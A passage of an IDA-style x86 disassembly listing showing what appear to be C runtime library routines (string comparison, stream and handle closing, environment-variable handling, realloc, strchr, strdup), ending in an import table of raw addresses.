cmp [ebp+arg_8], 0
jnz short loc_406F44
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_406F44: ; CODE XREF: sub_406F37+7�j
push dword_51729C
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_8]
push [ebp+arg_0]
push 1
push dword_5174C4
call sub_407091
add esp, 1Ch
test eax, eax
jnz short loc_406F71
mov eax, 7FFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_406F71: ; CODE XREF: sub_406F37+31�j
add eax, 0FFFFFFFEh
pop ebp
retn
sub_406F37 endp
; =============== S U B R O U T I N E =======================================
sub_406F76 proc near ; CODE XREF: sub_406904+1E�p
; sub_40730E+5B�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
mov esi, dword_409AB0
push edi
xor edi, edi
mov eax, [esi]
cmp eax, edi
jz short loc_406FD7
mov ebx, dword_4080C0
loc_406F8F: ; CODE XREF: sub_406F76+5F�j
push edi
push edi
push edi
push edi
push 0FFFFFFFFh
push eax
push edi
push 1
call ebx
mov ebp, eax
cmp ebp, edi
jz short loc_406FDF
push ebp
call sub_4028C6
cmp eax, edi
pop ecx
mov [esp+14h+var_4], eax
jz short loc_406FDF
push edi
push edi
push ebp
push eax
push 0FFFFFFFFh
push dword ptr [esi]
push edi
push 1
call ebx
test eax, eax
jz short loc_406FDF
push edi
push [esp+18h+var_4]
call sub_40730E
mov eax, [esi+4]
add esi, 4
pop ecx
cmp eax, edi
pop ecx
jnz short loc_406F8F
loc_406FD7: ; CODE XREF: sub_406F76+11�j
xor eax, eax
loc_406FD9: ; CODE XREF: sub_406F76+6C�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_406FDF: ; CODE XREF: sub_406F76+29�j
; sub_406F76+38�j ...
or eax, 0FFFFFFFFh
jmp short loc_406FD9
sub_406F76 endp
; =============== S U B R O U T I N E =======================================
sub_406FE4 proc near ; CODE XREF: sub_405B7A+FC4�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
mov eax, [esi+0Ch]
test al, 40h
jz short loc_406FF9
or eax, 0FFFFFFFFh
jmp short loc_407033
; ---------------------------------------------------------------------------
loc_406FF9: ; CODE XREF: sub_406FE4+E�j
test al, 83h
jz short loc_407031
push esi
call sub_406BAF
push esi
mov edi, eax
call sub_407607
push dword ptr [esi+10h]
call sub_407554
add esp, 0Ch
test eax, eax
jge short loc_40701F
or edi, 0FFFFFFFFh
jmp short loc_407031
; ---------------------------------------------------------------------------
loc_40701F: ; CODE XREF: sub_406FE4+34�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_407031
push eax
call sub_402B18
and dword ptr [esi+1Ch], 0
pop ecx
loc_407031: ; CODE XREF: sub_406FE4+17�j
; sub_406FE4+39�j ...
mov eax, edi
loc_407033: ; CODE XREF: sub_406FE4+13�j
and dword ptr [esi+0Ch], 0
pop edi
pop esi
retn
sub_406FE4 endp
; =============== S U B R O U T I N E =======================================
sub_40703A proc near ; CODE XREF: sub_406B74+2B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_518600
jnb short loc_407083
mov ecx, eax
mov edx, eax
sar ecx, 5
and edx, 1Fh
mov ecx, dword_518500[ecx*4]
test byte ptr [ecx+edx*8+4], 1
jz short loc_407083
push eax
call sub_406A62
pop ecx
push eax
call dword_408010
test eax, eax
jnz short loc_407078
call dword_408044
jmp short loc_40707A
; ---------------------------------------------------------------------------
loc_407078: ; CODE XREF: sub_40703A+34�j
xor eax, eax
loc_40707A: ; CODE XREF: sub_40703A+3C�j
test eax, eax
jz short locret_407090
mov dword_409A84, eax
loc_407083: ; CODE XREF: sub_40703A+A�j
; sub_40703A+22�j
mov dword_409A80, 9
or eax, 0FFFFFFFFh
locret_407090: ; CODE XREF: sub_40703A+42�j
retn
sub_40703A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407091 proc near ; CODE XREF: sub_406F37+27�p
var_3C = dword ptr -3Ch
var_36 = byte ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_408558
push offset sub_402E08
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
cmp dword_409D08, ebx
push 1
pop edi
jnz short loc_407104
push edi
mov eax, offset dword_4084F0
push eax
push edi
push eax
push ebx
push ebx
call dword_408034
test eax, eax
jz short loc_4070E1
mov dword_409D08, edi
jmp short loc_407104
; ---------------------------------------------------------------------------
loc_4070E1: ; CODE XREF: sub_407091+46�j
push edi
mov eax, offset dword_4084EC
push eax
push edi
push eax
push ebx
push ebx
call dword_40800C
test eax, eax
jz loc_4072FA
mov dword_409D08, 2
loc_407104: ; CODE XREF: sub_407091+31�j
; sub_407091+4E�j
mov esi, [ebp+arg_C]
cmp esi, ebx
jle short loc_40711B
push esi
push [ebp+arg_8]
call sub_406F0C
pop ecx
pop ecx
mov esi, eax
mov [ebp+arg_C], esi
loc_40711B: ; CODE XREF: sub_407091+78�j
cmp [ebp+arg_14], ebx
jle short loc_407130
push [ebp+arg_14]
push [ebp+arg_10]
call sub_406F0C
pop ecx
pop ecx
mov [ebp+arg_14], eax
loc_407130: ; CODE XREF: sub_407091+8D�j
mov eax, dword_409D08
cmp eax, 2
jnz short loc_407155
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40800C
jmp loc_4072FC
; ---------------------------------------------------------------------------
loc_407155: ; CODE XREF: sub_407091+A7�j
cmp eax, edi
jnz loc_4072FA
cmp [ebp+arg_18], ebx
jnz short loc_40716A
mov eax, dword_409CFC
mov [ebp+arg_18], eax
loc_40716A: ; CODE XREF: sub_407091+CF�j
cmp esi, ebx
jz short loc_407177
cmp [ebp+arg_14], ebx
jnz loc_40720F
loc_407177: ; CODE XREF: sub_407091+DB�j
cmp esi, [ebp+arg_14]
jnz short loc_407184
loc_40717C: ; CODE XREF: sub_407091+13C�j
; sub_407091+16D�j
push 2
loc_40717E: ; CODE XREF: sub_407091+146�j
pop eax
jmp loc_4072FC
; ---------------------------------------------------------------------------
loc_407184: ; CODE XREF: sub_407091+E9�j
cmp [ebp+arg_14], edi
jle short loc_407190
loc_407189: ; CODE XREF: sub_407091+151�j
; sub_407091+159�j ...
mov eax, edi
jmp loc_4072FC
; ---------------------------------------------------------------------------
loc_407190: ; CODE XREF: sub_407091+F6�j
cmp esi, edi
jg short loc_4071D5
lea eax, [ebp+var_3C]
push eax
push [ebp+arg_18]
call dword_408030
test eax, eax
jz loc_4072FA
cmp esi, ebx
jle short loc_4071D9
cmp [ebp+var_3C], 2
jb short loc_4071D5
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_4071D5
loc_4071BB: ; CODE XREF: sub_407091+142�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_4071D5
mov ecx, [ebp+arg_8]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_4071CF
cmp cl, dl
jbe short loc_40717C
loc_4071CF: ; CODE XREF: sub_407091+138�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_4071BB
loc_4071D5: ; CODE XREF: sub_407091+101�j
; sub_407091+120�j ...
push 3
jmp short loc_40717E
; ---------------------------------------------------------------------------
loc_4071D9: ; CODE XREF: sub_407091+11A�j
cmp [ebp+arg_14], ebx
jle short loc_40720F
cmp [ebp+var_3C], 2
jb short loc_407189
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_407189
loc_4071EC: ; CODE XREF: sub_407091+177�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_407189
mov ecx, [ebp+arg_10]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_407204
cmp cl, dl
jbe loc_40717C
loc_407204: ; CODE XREF: sub_407091+169�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_4071EC
jmp loc_407189
; ---------------------------------------------------------------------------
loc_40720F: ; CODE XREF: sub_407091+E0�j
; sub_407091+14B�j
push ebx
push ebx
push esi
push [ebp+arg_8]
push 9
push [ebp+arg_18]
call dword_40803C
mov [ebp+var_1C], eax
cmp eax, ebx
jz loc_4072FA
mov [ebp+var_4], ebx
add eax, eax
add eax, 3
and al, 0FCh
call sub_402CE0
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_40725E
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
mov [ebp+var_24], ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+arg_C]
push 1
pop edi
loc_40725E: ; CODE XREF: sub_407091+1B5�j
cmp [ebp+var_24], ebx
jz loc_4072FA
push [ebp+var_1C]
push [ebp+var_24]
push esi
push [ebp+arg_8]
push edi
push [ebp+arg_18]
mov esi, dword_40803C
call esi
test eax, eax
jz short loc_4072FA
push ebx
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push 9
push [ebp+arg_18]
call esi
mov esi, eax
mov [ebp+var_20], esi
cmp esi, ebx
jz short loc_4072FA
mov [ebp+var_4], edi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_402CE0
mov [ebp+var_18], esp
mov edi, esp
mov [ebp+var_28], edi
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4072C9
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor edi, edi
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_20]
loc_4072C9: ; CODE XREF: sub_407091+224�j
cmp edi, ebx
jz short loc_4072FA
push esi
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push 1
push [ebp+arg_18]
call dword_40803C
test eax, eax
jz short loc_4072FA
push esi
push edi
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_408034
jmp short loc_4072FC
; ---------------------------------------------------------------------------
loc_4072FA: ; CODE XREF: sub_407091+63�j
; sub_407091+C6�j ...
xor eax, eax
loc_4072FC: ; CODE XREF: sub_407091+BF�j
; sub_407091+EE�j ...
lea esp, [ebp-4Ch]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_407091 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40730E proc near ; CODE XREF: sub_406F76+50�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+arg_0], edi
jz short loc_407372
push 3Dh
push [ebp+arg_0]
call sub_407752
mov esi, eax
pop ecx
cmp esi, edi
pop ecx
mov [ebp+var_8], esi
jz short loc_407372
cmp [ebp+arg_0], esi
jz short loc_407372
mov eax, dword_409AA8
xor ebx, ebx
cmp [esi+1], bl
setz bl
cmp eax, dword_409AAC
jnz short loc_407358
push eax
call sub_4074ED
pop ecx
mov dword_409AA8, eax
loc_407358: ; CODE XREF: sub_40730E+3C�j
cmp eax, edi
jnz short loc_4073B0
cmp [ebp+arg_4], edi
jz short loc_40737A
cmp dword_409AB0, edi
jz short loc_40737A
call sub_406F76
test eax, eax
jz short loc_4073B0
loc_407372: ; CODE XREF: sub_40730E+D�j
; sub_40730E+22�j ...
or eax, 0FFFFFFFFh
loc_407375: ; CODE XREF: sub_40730E+182�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40737A: ; CODE XREF: sub_40730E+51�j
; sub_40730E+59�j
cmp ebx, edi
jnz loc_40748E
push 4
call sub_4028C6
cmp eax, edi
pop ecx
mov dword_409AA8, eax
jz short loc_407372
mov [eax], edi
cmp dword_409AB0, edi
jnz short loc_4073B0
push 4
call sub_4028C6
cmp eax, edi
pop ecx
mov dword_409AB0, eax
jz short loc_407372
mov [eax], edi
loc_4073B0: ; CODE XREF: sub_40730E+4C�j
; sub_40730E+62�j ...
sub esi, [ebp+arg_0]
mov edi, dword_409AA8
mov [ebp+var_4], edi
push esi
push [ebp+arg_0]
call sub_407495
mov esi, eax
pop ecx
test esi, esi
pop ecx
jl short loc_407410
cmp dword ptr [edi], 0
jz short loc_407410
test ebx, ebx
jz short loc_407408
push dword ptr [edi+esi*4]
lea edi, [edi+esi*4]
call sub_402B18
pop ecx
loc_4073E2: ; CODE XREF: sub_40730E+E2�j
cmp dword ptr [edi], 0
jz short loc_4073F2
mov eax, [edi+4]
inc esi
mov [edi], eax
add edi, 4
jmp short loc_4073E2
; ---------------------------------------------------------------------------
loc_4073F2: ; CODE XREF: sub_40730E+D7�j
mov eax, esi
shl eax, 2
push eax
push [ebp+var_4]
call sub_407632
pop ecx
test eax, eax
pop ecx
jz short loc_407442
jmp short loc_40743D
; ---------------------------------------------------------------------------
loc_407408: ; CODE XREF: sub_40730E+C6�j
mov eax, [ebp+arg_0]
mov [edi+esi*4], eax
jmp short loc_407442
; ---------------------------------------------------------------------------
loc_407410: ; CODE XREF: sub_40730E+BD�j
; sub_40730E+C2�j
test ebx, ebx
jnz short loc_40748E
test esi, esi
jge short loc_40741A
neg esi
loc_40741A: ; CODE XREF: sub_40730E+108�j
lea eax, ds:8[esi*4]
push eax
push edi
call sub_407632
pop ecx
test eax, eax
pop ecx
jz loc_407372
mov ecx, [ebp+arg_0]
mov [eax+esi*4], ecx
and dword ptr [eax+esi*4+4], 0
loc_40743D: ; CODE XREF: sub_40730E+F8�j
mov dword_409AA8, eax
loc_407442: ; CODE XREF: sub_40730E+F6�j
; sub_40730E+100�j
cmp [ebp+arg_4], 0
jz short loc_40748E
push [ebp+arg_0]
call sub_405B90
inc eax
inc eax
push eax
call sub_4028C6
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40748E
push [ebp+arg_0]
push esi
call sub_4062D0
mov eax, esi
pop ecx
sub eax, [ebp+arg_0]
pop ecx
add eax, [ebp+var_8]
and byte ptr [eax], 0
inc eax
neg ebx
sbb ebx, ebx
not ebx
and ebx, eax
push ebx
push esi
call dword_408060
push esi
call sub_402B18
pop ecx
loc_40748E: ; CODE XREF: sub_40730E+6E�j
; sub_40730E+104�j ...
xor eax, eax
jmp loc_407375
sub_40730E endp
; =============== S U B R O U T I N E =======================================
sub_407495 proc near ; CODE XREF: sub_40730E+B2�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, dword_409AA8
push edi
mov eax, [esi]
test eax, eax
jz short loc_4074D0
mov edi, [esp+8+arg_4]
loc_4074A7: ; CODE XREF: sub_407495+39�j
push edi
push eax
push [esp+10h+arg_0]
call sub_406F37
add esp, 0Ch
test eax, eax
jnz short loc_4074C6
mov eax, [esi]
mov al, [eax+edi]
cmp al, 3Dh
jz short loc_4074E0
test al, al
jz short loc_4074E0
loc_4074C6: ; CODE XREF: sub_407495+22�j
mov eax, [esi+4]
add esi, 4
test eax, eax
jnz short loc_4074A7
loc_4074D0: ; CODE XREF: sub_407495+C�j
mov eax, esi
sub eax, dword_409AA8
sar eax, 2
neg eax
loc_4074DD: ; CODE XREF: sub_407495+56�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4074E0: ; CODE XREF: sub_407495+2B�j
; sub_407495+2F�j
mov eax, esi
sub eax, dword_409AA8
sar eax, 2
jmp short loc_4074DD
sub_407495 endp
; =============== S U B R O U T I N E =======================================
sub_4074ED proc near ; CODE XREF: sub_40730E+3F�p
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor ecx, ecx
test edi, edi
jnz short loc_4074FC
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_4074FC: ; CODE XREF: sub_4074ED+9�j
cmp dword ptr [edi], 0
lea eax, [edi+4]
jz short loc_40750E
loc_407504: ; CODE XREF: sub_4074ED+1F�j
mov edx, [eax]
inc ecx
add eax, 4
test edx, edx
jnz short loc_407504
loc_40750E: ; CODE XREF: sub_4074ED+15�j
push ebx
push ebp
lea eax, ds:4[ecx*4]
push esi
push eax
call sub_4028C6
mov esi, eax
pop ecx
test esi, esi
mov ebp, esi
jnz short loc_40752F
push 9
call sub_402FD6
pop ecx
loc_40752F: ; CODE XREF: sub_4074ED+38�j
mov eax, [edi]
mov ebx, edi
loc_407533: ; CODE XREF: sub_4074ED+5B�j
test eax, eax
jz short loc_40754A
push eax
add ebx, 4
call sub_4077C5
mov [esi], eax
mov eax, [ebx]
pop ecx
add esi, 4
jmp short loc_407533
; ---------------------------------------------------------------------------
loc_40754A: ; CODE XREF: sub_4074ED+48�j
and dword ptr [esi], 0
mov eax, ebp
pop esi
pop ebp
pop ebx
pop edi
retn
sub_4074ED endp
; =============== S U B R O U T I N E =======================================
sub_407554 proc near ; CODE XREF: sub_406FE4+2A�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
cmp edi, dword_518600
jnb loc_4075EE
mov eax, edi
mov esi, edi
sar eax, 5
and esi, 1Fh
lea ebx, ds:518500h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_4075EE
push edi
call sub_406A62
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4075CD
cmp edi, 1
jz short loc_40759B
cmp edi, 2
jnz short loc_4075B1
loc_40759B: ; CODE XREF: sub_407554+40�j
push 2
call sub_406A62
push 1
mov ebp, eax
call sub_406A62
pop ecx
cmp eax, ebp
pop ecx
jz short loc_4075CD
loc_4075B1: ; CODE XREF: sub_407554+45�j
push edi
call sub_406A62
pop ecx
push eax
call dword_408090
test eax, eax
jnz short loc_4075CD
call dword_408044
mov ebp, eax
jmp short loc_4075CF
; ---------------------------------------------------------------------------
loc_4075CD: ; CODE XREF: sub_407554+3B�j
; sub_407554+5B�j ...
xor ebp, ebp
loc_4075CF: ; CODE XREF: sub_407554+77�j
push edi
call sub_4069E8
mov eax, [ebx]
pop ecx
and byte ptr [eax+esi+4], 0
test ebp, ebp
jz short loc_4075EA
push ebp
call sub_406981
pop ecx
jmp short loc_4075FF
; ---------------------------------------------------------------------------
loc_4075EA: ; CODE XREF: sub_407554+8B�j
xor eax, eax
jmp short loc_407602
; ---------------------------------------------------------------------------
loc_4075EE: ; CODE XREF: sub_407554+E�j
; sub_407554+2F�j
and dword_409A84, 0
mov dword_409A80, 9
loc_4075FF: ; CODE XREF: sub_407554+94�j
or eax, 0FFFFFFFFh
loc_407602: ; CODE XREF: sub_407554+98�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_407554 endp
; =============== S U B R O U T I N E =======================================
sub_407607 proc near ; CODE XREF: sub_406FE4+22�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_407630
test al, 8
jz short loc_407630
push dword ptr [esi+8]
call sub_402B18
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_407630: ; CODE XREF: sub_407607+A�j
; sub_407607+E�j
pop esi
retn
sub_407607 endp
; =============== S U B R O U T I N E =======================================
sub_407632 proc near ; CODE XREF: sub_40730E+ED�p
; sub_40730E+115�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push ebp
push esi
test ebx, ebx
push edi
jnz short loc_40764D
push [esp+10h+arg_4]
call sub_4028C6
pop ecx
jmp loc_40774D
; ---------------------------------------------------------------------------
loc_40764D: ; CODE XREF: sub_407632+A�j
mov esi, [esp+10h+arg_4]
test esi, esi
jnz short loc_407663
push ebx
call sub_402B18
pop ecx
loc_40765C: ; CODE XREF: sub_407632+114�j
xor eax, eax
jmp loc_40774D
; ---------------------------------------------------------------------------
loc_407663: ; CODE XREF: sub_407632+21�j
; sub_407632+10E�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_40772E
push ebx
call sub_4030B4
mov ebp, eax
pop ecx
test ebp, ebp
jz loc_40770B
cmp esi, dword_4090FC
ja short loc_4076CB
push esi
push ebx
push ebp
call sub_4038BF
add esp, 0Ch
test eax, eax
jz short loc_40769A
mov edi, ebx
jmp short loc_4076C3
; ---------------------------------------------------------------------------
loc_40769A: ; CODE XREF: sub_407632+62�j
push esi
call sub_40340A
mov edi, eax
pop ecx
test edi, edi
jz short loc_4076CB
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_4076B1
mov eax, esi
loc_4076B1: ; CODE XREF: sub_407632+7B�j
push eax
push ebx
push edi
call sub_4063C0
push ebx
push ebp
call sub_4030DF
add esp, 14h
loc_4076C3: ; CODE XREF: sub_407632+66�j
test edi, edi
jnz loc_40774B
loc_4076CB: ; CODE XREF: sub_407632+53�j
; sub_407632+73�j
test esi, esi
jnz short loc_4076D2
push 1
pop esi
loc_4076D2: ; CODE XREF: sub_407632+9B�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push dword_51861C
call dword_40806C
mov edi, eax
test edi, edi
jz short loc_40772E
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_4076F7
mov eax, esi
loc_4076F7: ; CODE XREF: sub_407632+C1�j
push eax
push ebx
push edi
call sub_4063C0
push ebx
push ebp
call sub_4030DF
add esp, 14h
jmp short loc_40772A
; ---------------------------------------------------------------------------
loc_40770B: ; CODE XREF: sub_407632+47�j
test esi, esi
jnz short loc_407712
push 1
pop esi
loc_407712: ; CODE XREF: sub_407632+DB�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push ebx
push 0
push dword_51861C
call dword_4080B0
mov edi, eax
loc_40772A: ; CODE XREF: sub_407632+D7�j
test edi, edi
jnz short loc_40774B
loc_40772E: ; CODE XREF: sub_407632+36�j
; sub_407632+B9�j
cmp dword_409AF4, 0
jz short loc_40774B
push esi
call sub_40301F
test eax, eax
pop ecx
jnz loc_407663
jmp loc_40765C
; ---------------------------------------------------------------------------
loc_40774B: ; CODE XREF: sub_407632+93�j
; sub_407632+FA�j ...
mov eax, edi
loc_40774D: ; CODE XREF: sub_407632+16�j
; sub_407632+2C�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_407632 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407752 proc near ; CODE XREF: sub_40730E+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp dword_5172AC, 0
jnz short loc_40776D
push [ebp+arg_4]
push [ebp+arg_0]
call sub_407800
pop ecx
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40776D: ; CODE XREF: sub_407752+A�j
mov ecx, [ebp+arg_0]
loc_407770: ; CODE XREF: sub_407752+56�j
movzx ax, byte ptr [ecx]
test ax, ax
jz short loc_4077B3
movzx edx, al
test byte_5173C1[edx], 4
jz short loc_40779F
mov dl, [ecx+1]
inc ecx
test dl, dl
jz short loc_4077AA
movzx eax, ax
movzx edx, dl
shl eax, 8
or eax, edx
cmp [ebp+arg_4], eax
jz short loc_4077AE
jmp short loc_4077A7
; ---------------------------------------------------------------------------
loc_40779F: ; CODE XREF: sub_407752+31�j
movzx edx, ax
cmp [ebp+arg_4], edx
jz short loc_4077B3
loc_4077A7: ; CODE XREF: sub_407752+4B�j
inc ecx
jmp short loc_407770
; ---------------------------------------------------------------------------
loc_4077AA: ; CODE XREF: sub_407752+39�j
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4077AE: ; CODE XREF: sub_407752+49�j
lea eax, [ecx-1]
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4077B3: ; CODE XREF: sub_407752+25�j
; sub_407752+53�j
movzx edx, ax
mov eax, [ebp+arg_4]
sub eax, edx
neg eax
sbb eax, eax
not eax
and eax, ecx
pop ebp
retn
sub_407752 endp
; =============== S U B R O U T I N E =======================================
sub_4077C5 proc near ; CODE XREF: sub_4017F0+783�p
; sub_4074ED+4E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_4077EC
push esi
call sub_405B90
inc eax
push eax
call sub_4028C6
pop ecx
test eax, eax
pop ecx
jz short loc_4077EC
push esi
push eax
call sub_4062D0
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4077EC: ; CODE XREF: sub_4077C5+7�j
; sub_4077C5+1A�j
xor eax, eax
pop esi
retn
sub_4077C5 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_407800
loc_4077F0: ; CODE XREF: sub_407800+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_407800
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407800 proc near ; CODE XREF: sub_407752+12�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 004077F0 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_40782B
loc_407818: ; CODE XREF: sub_407800+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_4077F0
test cl, cl
jz short loc_407874
test edx, 3
jnz short loc_407818
loc_40782B: ; CODE XREF: sub_407800+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_407836: ; CODE XREF: sub_407800+61�j
; sub_407800+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_407878
and eax, 81010100h
jz short loc_407836
and eax, 1010100h
jnz short loc_407872
and esi, 80000000h
jnz short loc_407836
loc_407872: ; CODE XREF: sub_407800+68�j
; sub_407800+81�j ...
pop esi
pop edi
loc_407874: ; CODE XREF: sub_407800+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_407878: ; CODE XREF: sub_407800+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_4078B5
test al, al
jz short loc_407872
cmp ah, bl
jz short loc_4078AE
test ah, ah
jz short loc_407872
shr eax, 10h
cmp al, bl
jz short loc_4078A7
test al, al
jz short loc_407872
cmp ah, bl
jz short loc_4078A0
test ah, ah
jz short loc_407872
jmp short loc_407836
; ---------------------------------------------------------------------------
loc_4078A0: ; CODE XREF: sub_407800+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4078A7: ; CODE XREF: sub_407800+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4078AE: ; CODE XREF: sub_407800+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4078B5: ; CODE XREF: sub_407800+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_407800 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4078C0 proc near ; CODE XREF: sub_402D10+13�p
jmp dword_40808C
sub_4078C0 endp
; ---------------------------------------------------------------------------
align 4
dd 1CEh dup(0)
dword_408000 dd 874Ch dword_408004 dd 875Eh dd 0
dword_40800C dd 8A56h ; sub_407091+B9�r
dword_408010 dd 8A42h dword_408014 dd 8A32h ; sub_406CE8+14D�r ...
dword_408018 dd 8A22h ; sub_406CE8+A7�r
dword_40801C dd 8A12h dword_408020 dd 8A02h dword_408024 dd 89F0h dword_408028 dd 89E4h dword_40802C dd 89DAh dword_408030 dd 89CEh ; sub_40612F+14�r ...
dword_408034 dd 8A68h ; sub_407091+261�r
dword_408038 dd 89AAh ; sub_405D65+8D�r
dword_40803C dd 8994h ; sub_405D65+11B�r ...
dword_408040 dd 8982h dword_408044 dd 8972h ; sub_4058BE:loc_4059E3�r ...
dword_408048 dd 8966h ; sub_4058BE+D8�r ...
dword_40804C dd 86F0h ; sub_4017F0+21E�r
dword_408050 dd 86F8h dword_408054 dd 8702h ; sub_4017F0+1A2�r ...
dword_408058 dd 8718h dword_40805C dd 8728h dword_408060 dd 8A7Ah dword_408064 dd 89BCh ; sub_405D65+12D�r
dword_408068 dd 8810h dword_40806C dd 877Ch ; sub_403076+D�r ...
dword_408070 dd 8788h ; sub_402FFB+1D�r
dword_408074 dd 8796h dword_408078 dd 87AAh dword_40807C dd 87BEh ; sub_4052DA+38�r
dword_408080 dd 87D8h dword_408084 dd 87E8h dword_408088 dd 87F8h ; sub_4030DF+2C4�r ...
dword_40808C dd 8804h dword_408090 dd 8A94h dword_408094 dd 8824h ; sub_404C58+59�r
dword_408098 dd 8836h dword_40809C dd 8848h dword_4080A0 dd 8856h dword_4080A4 dd 8864h dword_4080A8 dd 8872h dword_4080AC dd 8880h ; sub_4037C4+51�r
dword_4080B0 dd 8890h ; sub_407632+F0�r
